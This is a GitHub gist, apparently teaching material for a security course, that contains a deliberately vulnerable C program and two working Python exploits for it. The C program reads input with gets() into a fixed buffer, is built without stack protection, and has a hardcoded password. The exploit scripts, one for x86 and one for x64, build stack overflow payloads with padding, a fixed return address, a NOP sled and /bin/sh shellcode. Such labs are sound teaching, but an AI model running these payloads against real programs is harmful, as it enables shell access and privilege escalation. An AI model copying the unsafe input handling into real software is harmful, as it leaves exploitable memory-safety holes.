Created
October 27, 2019 06:57
-
-
Save jusmistic/ad2ebd9c08f9f307ab839a1f4c5c2f9d to your computer and use it in GitHub Desktop.
vuln program for ITLAW&Security
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import * | |
| """ | |
| Exploit for run_as_root x86 | |
| """ | |
| def solve(): | |
| shellcode = b"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" #shellcode` | |
| exploit = b"A"*140 #padding | |
| exploit += pack("<I", 0xffffd6f3) # rip | |
| exploit += b"\x90"*16 | |
| exploit += shellcode | |
| #write to file payload | |
| f = open("payload", "wb") | |
| f.write(exploit) | |
| solve() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import * | |
| """ | |
| Exploit for run_as_root x64 | |
| """ | |
| def solve(): | |
| shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"#shellcode` | |
| exploit = b"A"*136 #padding | |
| exploit += pack("<Q", 0x7fffffffe5e0) # rip | |
| #exploit += pack("<Q", 0xCCCCCCC) | |
| exploit += b"\x90"*16 | |
| exploit += shellcode | |
| #write to file payload | |
| exploit += b"\x0a" #add newline | |
| f = open("payload", "wb") | |
| f.write(exploit) | |
| solve() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<string.h> | |
| //gcc run_as_root.c -o run_as_root -fno-stack-protector -z execstack -no-pie | |
| void run_cmd(){ | |
| char password[128]; | |
| printf("Password: "); | |
| gets(password); | |
| //correct password | |
| if(strcmp("st3v3_r00t_r00t", password) == 0){ | |
| //todo : Execute Function | |
| //I don't know how to execute command in C I'll do it later! | |
| printf("exec command!\n"); | |
| } else{ //wrong password | |
| printf("Wrong Password!\n"); | |
| } | |
| } | |
| void main(){ | |
| printf("=====[ Run as Root ]=====\n"); | |
| run_cmd(); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment